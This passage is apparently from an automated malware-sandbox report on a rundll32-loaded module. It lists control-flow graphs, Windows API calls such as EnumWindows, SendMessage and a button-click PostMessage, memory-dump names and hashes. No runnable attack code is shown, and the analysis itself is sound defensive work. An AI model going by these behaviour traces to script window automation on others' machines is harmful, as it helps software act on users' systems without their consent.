                                                                              control_flow_graph 67 41f0844-41f08de call 41f0cf4 call 41f0d04 call 41f0d14 call 41f0d24 * 3 80 41f0908-41f0915 67->80 81 41f08e0-41f0903 RaiseException 67->81 83 41f091a-41f093a 80->83 84 41f0917 80->84 82 41f0b18-41f0b1e 81->82 85 41f094d-41f0955 83->85 86 41f093c-41f094b call 41f0d34 83->86 84->83 87 41f0958-41f0961 85->87 86->87 89 41f097a-41f097c 87->89 90 41f0963-41f0973 87->90 92 41f0a3e-41f0a48 89->92 93 41f0982-41f0989 89->93 90->89 99 41f0975 90->99 97 41f0a4a-41f0a56 92->97 98 41f0a58-41f0a5a 92->98 95 41f098b-41f0997 93->95 96 41f0999-41f099b 93->96 95->96 100 41f099d-41f09a6 LoadLibraryA 96->100 101 41f09a8-41f09aa 96->101 97->98 102 41f0a5c-41f0a60 98->102 103 41f0aa7-41f0aa9 98->103 106 41f0af6-41f0afd 99->106 100->101 110 41f09ac-41f09bb GetLastError 101->110 111 41f09f7-41f0a03 call 41f0138 101->111 104 41f0a9b-41f0aa5 GetProcAddress 102->104 105 41f0a62-41f0a66 102->105 107 41f0aab-41f0aba GetLastError 103->107 108 41f0af1-41f0af4 103->108 104->103 105->104 115 41f0a68-41f0a73 105->115 113 41f0aff-41f0b0e 106->113 114 41f0b16 106->114 117 41f0abc-41f0ac8 107->117 118 41f0aca-41f0acc 107->118 108->106 119 41f09bd-41f09c9 110->119 120 41f09cb-41f09cd 110->120 127 41f0a38-41f0a39 FreeLibrary 111->127 128 41f0a05-41f0a09 111->128 113->114 114->82 115->104 121 41f0a75-41f0a7b 115->121 117->118 118->108 124 41f0ace-41f0aee RaiseException 118->124 119->120 120->111 122 41f09cf-41f09f2 RaiseException 120->122 121->104 126 41f0a7d-41f0a8a 121->126 122->82 124->108 126->104 130 41f0a8c-41f0a97 126->130 127->92 128->92 131 41f0a0b-41f0a19 LocalAlloc 128->131 130->104 132 41f0a99 130->132 131->92 133 41f0a1b-41f0a36 131->133 132->108 133->92
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 041F08FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: 70c4a7a5d5011964ddfb7cd8d287c7ab73b2f9750bc83fedd50f98f5de4bdaf6
                                                                              • Instruction ID: cb81bc4f7444a14ae6ab1698d6f897650cd29311dee01ec743b21e882722dd0a
                                                                              • Opcode Fuzzy Hash: 70c4a7a5d5011964ddfb7cd8d287c7ab73b2f9750bc83fedd50f98f5de4bdaf6
                                                                              • Instruction Fuzzy Hash: 48A17275A012099FEB14DFA8CDC0BAEBBF5FB4C314F144169E609A7281D774B986CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 043FD10C: EnumWindows.USER32(043FD074,00000000), ref: 043FD12C
                                                                              • EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD241
                                                                              • SendMessageW.USER32(0001048C,00000102,?,00000000), ref: 043FD29A
                                                                              • Sleep.KERNEL32(0000005A,00000000,043FD315,?,?,?,00000000,00000000,?,043FD372), ref: 043FD2A5
                                                                              • EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD2CD
                                                                              • PostMessageW.USER32(0001048C,000000F5,00000000,00000000), ref: 043FD2EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: EnumWindows$ChildMessage$PostSendSleep
                                                                              • String ID: BUTTON$EDIT
                                                                              • API String ID: 851923797-1643690610
                                                                              • Opcode ID: 01eca8ecf0ec430cd84b9fcf1179e7798866667d724bf78f30d78c1930e1df30
                                                                              • Instruction ID: 476212676c08d621ca9a7d7821a3b43b08d71e1a52989f06d55b45816f4e772e
                                                                              • Opcode Fuzzy Hash: 01eca8ecf0ec430cd84b9fcf1179e7798866667d724bf78f30d78c1930e1df30
                                                                              • Instruction Fuzzy Hash: 1B314874740204BFFB11EBA4DD89F5A37A9EB09708F602065E711AB291D779FD018B90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 159 43c7d04-43c7d1f PeekMessageW 160 43c7e0d-43c7e14 159->160 161 43c7d25-43c7d29 159->161 162 43c7d39 161->162 163 43c7d2b-43c7d33 IsWindowUnicode 161->163 165 43c7d3b-43c7d44 162->165 163->162 164 43c7d35-43c7d37 163->164 164->165 166 43c7d5c-43c7d6f PeekMessageA 165->166 167 43c7d46-43c7d5a PeekMessageW 165->167 168 43c7d70-43c7d72 166->168 167->168 168->160 169 43c7d78-43c7d7e 168->169 170 43c7d84-43c7d90 169->170 171 43c7e06 169->171 172 43c7da2-43c7dad call 43c9ba0 170->172 173 43c7d92-43c7d96 170->173 171->160 172->160 176 43c7daf-43c7dba call 43c7b98 172->176 173->172 176->160 179 43c7dbc-43c7dc0 176->179 179->160 180 43c7dc2-43c7dcd call 43c7a50 179->180 180->160 183 43c7dcf-43c7dda call 43c7aa0 180->183 183->160 186 43c7ddc-43c7de7 call 43c7a08 183->186 186->160 189 43c7de9-43c7df4 TranslateMessage 186->189 190 43c7dfe-43c7e04 DispatchMessageA 189->190 191 43c7df6-43c7dfc DispatchMessageW 189->191 190->160 191->160
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 043C7D18
                                                                              • IsWindowUnicode.USER32 ref: 043C7D2C
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 043C7D4F
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 043C7D65
                                                                              • TranslateMessage.USER32 ref: 043C7DEA
                                                                              • DispatchMessageW.USER32 ref: 043C7DF7
                                                                              • DispatchMessageA.USER32 ref: 043C7DFF
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                              • String ID:
                                                                              • API String ID: 2190272339-0
                                                                              • Opcode ID: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction ID: 6c09f833da9c03f5824d7e9b48e14f2fe8a26680e9db00c560195bf0878664b7
                                                                              • Opcode Fuzzy Hash: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction Fuzzy Hash: 7621262134470276FB326A390C45BBED69A4F81B08F14580DEE82972C1D795BC035F92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 192 41e9778-41e9785 193 41e978c-41e97c0 GetCurrentThreadId 192->193 194 41e9787 192->194 195 41e97c4-41e97f0 call 41e965c 193->195 196 41e97c2 193->196 194->193 199 41e97f9-41e9800 195->199 200 41e97f2-41e97f4 195->200 196->195 202 41e980a-41e9810 199->202 203 41e9802-41e9805 199->203 200->199 201 41e97f6 200->201 201->199 204 41e9815-41e981c 202->204 205 41e9812 202->205 203->202 206 41e981e-41e9825 204->206 207 41e982b-41e982f 204->207 205->204 206->207 208 41e9ac4-41e9ade 207->208 209 41e9835 call 41e970c 207->209 211 41e9ae0-41e9aec call 41e99a4 call 41e9a2c 208->211 212 41e9af1-41e9af8 208->212 215 41e983a 209->215 211->212 213 41e9afa-41e9b05 GetCurrentThreadId 212->213 214 41e9b1b-41e9b1f 212->214 213->214 217 41e9b07-41e9b16 call 41e967c call 41e9a00 213->217 218 41e9b39-41e9b3d 214->218 219 41e9b21-41e9b25 214->219 217->214 223 41e9b3f-41e9b42 218->223 224 41e9b49-41e9b4d 218->224 219->218 222 41e9b27-41e9b37 219->222 222->218 223->224 227 41e9b44-41e9b46 223->227 228 41e9b4f-41e9b58 call 41e6f34 224->228 229 41e9b6c-41e9b75 call 41e96a4 224->229 227->224 228->229 237 41e9b5a-41e9b6a call 41e7f28 call 41e6f34 228->237 238 41e9b7c-41e9b81 229->238 239 41e9b77-41e9b7a 229->239 237->229 241 41e9b9d-41e9ba8 call 41e967c 238->241 242 41e9b83-41e9b91 call 41ed92c 238->242 239->238 239->241 249 41e9bad-41e9bb1 241->249 250 41e9baa 241->250 242->241 252 41e9b93-41e9b95 242->252 253 41e9bba-41e9bbd 249->253 254 41e9bb3-41e9bb5 call 41e9a00 249->254 250->249 252->241 255 41e9b97-41e9b98 FreeLibrary 252->255 257 41e9bbf-41e9bc6 253->257 258 41e9bd6-41e9be7 253->258 254->253 255->241 259 41e9bce-41e9bd1 ExitProcess 257->259 260 41e9bc8 257->260 258->218 260->259
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E97AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 2882836952-0
                                                                              • Opcode ID: 97ac1a4e98c1001a4c66fbef65f16798e0dafc360f9f6786cab59e7ca15ffe7a
                                                                              • Instruction ID: 2fce514c7292916ff1f1ec524bf46b8802b781b17b1af3a0ab5bb4b595f8d9e5
                                                                              • Opcode Fuzzy Hash: 97ac1a4e98c1001a4c66fbef65f16798e0dafc360f9f6786cab59e7ca15ffe7a
                                                                              • Instruction Fuzzy Hash: 32517FB8A20B449FEF24DF6AC4C4B7A77E1EF48318F14459AE8098B251D778F885CB15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 261 43fd10c-43fd138 call 41ea174 EnumWindows 264 43fd13c-43fd13f 261->264 265 43fd13a 261->265 265->264
                                                                              APIs
                                                                              • EnumWindows.USER32(043FD074,00000000), ref: 043FD12C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: EnumWindows
                                                                              • String ID: He36SH
                                                                              • API String ID: 1129996299-687003847
                                                                              • Opcode ID: dbda8072cab860a898acb711b39bde8f537aa4ed2ceabc3920d18f54b545dd69
                                                                              • Instruction ID: 75fe081848229e3f58a083ff188db175817581470ed8718fcddc980119a292d0
                                                                              • Opcode Fuzzy Hash: dbda8072cab860a898acb711b39bde8f537aa4ed2ceabc3920d18f54b545dd69
                                                                              • Instruction Fuzzy Hash: 4CD0A9B83432000BF3109AB82DC8715A283E30220CF003136A3209A250C368B8018700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 266 43c7f48-43c7f60 267 43c7f62-43c7f71 call 41e8334 266->267 268 43c7f73-43c7f75 266->268 267->268 272 43c7f77 267->272 270 43c7f79-43c7fed 268->270 276 43c7fef-43c7fff call 41e8214 270->276 277 43c8063-43c8077 270->277 272->270 276->277 284 43c8001-43c801b call 431eb78 276->284 278 43c8079-43c8089 call 41e8214 277->278 279 43c8095 277->279 278->279 285 43c808b-43c808e 278->285 288 43c801d-43c8040 GetWindowLongW SetWindowLongW 284->288 289 43c8045-43c805e call 43bacf4 284->289 285->279 288->289 289->277
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 043C8029
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043C8040
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID:
                                                                              • API String ID: 1378638983-0
                                                                              • Opcode ID: f060f1a37f18e86519786d6b4e1ca54714e03da49534ade6aae597d4263eef0c
                                                                              • Instruction ID: bf744c8db517705574c60b9efa4aa7937119c03a4e30bbd25909746b8f284b9a
                                                                              • Opcode Fuzzy Hash: f060f1a37f18e86519786d6b4e1ca54714e03da49534ade6aae597d4263eef0c
                                                                              • Instruction Fuzzy Hash: CE418F34A04644EFDB05DF68C980AAEB7F6EF49304F6195A9E814AB362C734AE41DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,041ED6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,041ED786,00000000,?,00000105), ref: 041ED693
                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,041ED6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,041ED786,00000000,?,00000105), ref: 041ED6BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLanguage$SystemUser
                                                                              • String ID:
                                                                              • API String ID: 384301227-0
                                                                              • Opcode ID: 92afd7f719e1531bc9b5143813ec110a27e5e483de5ac40e66b89851ea0f585e
                                                                              • Instruction ID: 462a21ea3fe6cad9cfcd998ff5092a1c6f9fbea6ff200c0fa96bdb8865b61b19
                                                                              • Opcode Fuzzy Hash: 92afd7f719e1531bc9b5143813ec110a27e5e483de5ac40e66b89851ea0f585e
                                                                              • Instruction Fuzzy Hash: 66313078A10A1ADFEB10EFAAD8C0ABEB7B5FF48308F504465D414A7650DB74BD84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED748
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED799
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName
                                                                              • String ID:
                                                                              • API String ID: 1159719554-0
                                                                              • Opcode ID: 891680b0f53a57c2f3790dc88de636f07125abf9cac9913cf59007879838e112
                                                                              • Instruction ID: e82175a4745f6afe41e2e2041029aeb679fd9d0472d89eb40a3d061a3450c64a
                                                                              • Opcode Fuzzy Hash: 891680b0f53a57c2f3790dc88de636f07125abf9cac9913cf59007879838e112
                                                                              • Instruction Fuzzy Hash: 17119474A4061DAFEB14EB91DCC5BEEB3B8EF48708F4144B5A508A3250DB706F858E54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 043FD097
                                                                              • SendMessageW.USER32(?,0000000D,00000000,00000000), ref: 043FD0B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 36b44f7de5cc3f9988bd1722dae8f5495bf816cdb5b163250c72d6ced36834a4
                                                                              • Instruction ID: 2429ef4bde73387b370d11b00ba0bf7e4b421c132fed11c38b94500e2155b978
                                                                              • Opcode Fuzzy Hash: 36b44f7de5cc3f9988bd1722dae8f5495bf816cdb5b163250c72d6ced36834a4
                                                                              • Instruction Fuzzy Hash: FD01A734200604BFFB11EB51DD91F6E77ADEF45758F610571FA11AB290DBB4BE028690
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,041E7D6A,?,?,?,00000000), ref: 041E7D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString
                                                                              • String ID:
                                                                              • API String ID: 1825529933-0
                                                                              • Opcode ID: 31dab3e89065ad673f14644f0cdaed8e35e6ea423bb5541f0a80278cfc1d8f2b
                                                                              • Instruction ID: a39d823be11dc521dc2a5da76d47b94de0d775fe3756218a8de3c68f4dbf50d3
                                                                              • Opcode Fuzzy Hash: 31dab3e89065ad673f14644f0cdaed8e35e6ea423bb5541f0a80278cfc1d8f2b
                                                                              • Instruction Fuzzy Hash: 36F0C279344A447FFB11E76ADCD1DBD73ACEF88648B110471F401E3250D7A5AE059A10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 407 41ec498-41ec4a6 408 41ec4a8-41ec4bf GetModuleFileNameW call 41ed70c 407->408 409 41ec4d3-41ec4de 407->409 411 41ec4c4-41ec4cb 408->411 411->409 412 41ec4cd-41ec4d0 411->412 412->409
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(041E0000,?,0000020A), ref: 041EC4B6
                                                                                • Part of subcall function 041ED70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED748
                                                                                • Part of subcall function 041ED70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,041ED7C6,?,041E0000,04408C1C), ref: 041ED799
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
